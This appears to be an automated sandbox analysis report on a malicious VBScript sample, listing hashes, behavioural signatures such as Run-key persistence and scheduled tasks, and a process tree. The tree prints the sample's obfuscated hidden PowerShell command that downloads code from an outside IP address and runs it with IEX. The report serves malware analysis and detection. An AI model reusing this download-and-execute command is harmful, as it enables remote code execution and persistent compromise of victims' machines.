Analysis
-
max time kernel
277s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
08-07-2024 17:58
General
-
Target
vd.vbs
-
Size
10KB
-
MD5
f3a9219e977b293b8cb364f8c8378284
-
SHA1
6f5ee3933bc669d7af2acccc842c60db60be16f4
-
SHA256
b72c0371a70cfeab0cfe44b72ef08716f6a3345cce395453e4cf931bf1f603ae
-
SHA512
3960ed3091dfe3845832af7911c227c3e6f0cdfb97fd404224e1361ccb3d78e7b20a98fd3397ddd7e254113fb81983ca30f90cc28751390da3964a56ff2bfd91
-
SSDEEP
192:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/QFfW6V5k6uS3N7AVzSXqLFCy+/7lm70OR:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/h
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vd.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0DFE5737-CA6C-4571-B35D-D546A1CF0C01} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD57b18b312ef22dcc8e196999d5d6a8490
SHA108755acd45be3082007e236ea6985e43d91b67ac
SHA25681338d4e2a6916c0e00b9269bd4f4e2d841ae277c824f0faee1c88f39d1c57cb
SHA512422c2af6fc871259653e83a94895c5e69146a1c06c0eb992e6d510f91456e2be46180a4d04cc379ccbe0a2a67231f549e1296e6fb0099db30649eee943e4c9b1
-
Filesize
7KB
MD58491967d7fd56319b69b6f3e43dd8ee3
SHA1691197cef7c4ad87fb7295412f209203883fef16
SHA256c836f6db01efe7cf8af872b7f00881c03a47aecee2f581f208b73c081898ffea
SHA512438c93010b8557be0e763311d77306ea3e91f541728c8e51b1d8e06e3e1935b2a6355fe979f2e9bcc1d90fedd23dcf61f4164cdbb11a02413061193a35dac919
-
Filesize
295B
MD5b032577b9070ec04b20b017a13b80fe1
SHA1456e02f79a9ef827d74a33640a226903915deda3
SHA25698bde1eda05213754847ccc53758e69bda57349e459adf3c05fc20ce30696eea
SHA51237524791846a5a4ce3eaeaa5c0982f1a9d052ba773b12e2402a4dd9cedaaf1f438b0e12b9c7d14183263cf0b86b380822ed4210d69e0c875bccdca06ab3f03a4
-
Filesize
708KB
MD5fa0c7ef78bbed4f5a0d05219583f3b6f
SHA11c584ee82ef5ac9e1fc9d991312222abbbdb3b66
SHA2563f57616aad7f78dd1b087414b2219dd704866c340716791c1b20452d4fd87cde
SHA512339e09113a0b51364bc86824ed8078e192d5810716f523389e9e7a16fd80fc1d23bd2e878979ff281d1f3e60cd5ae50e415c457c04cefa6a815e993cb2f10e16
-
Filesize
1001B
MD5f23c6311937368a391ae7f1a20f353f3
SHA153c02ed76746bc693ba51f11f896bbf88338172d
SHA2564bd33af73be9da6aea7e8c86f1b178d8cf143ddae78379d9350ccb107e4f903d
SHA51295b2964c414f4193bc20a2f1788d004fba4bf3242099be7fd416e5a88e7c18abdfcb6652083a70ab04d0824892b16991a1bc933de4743d77764988d3f0e4df35
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB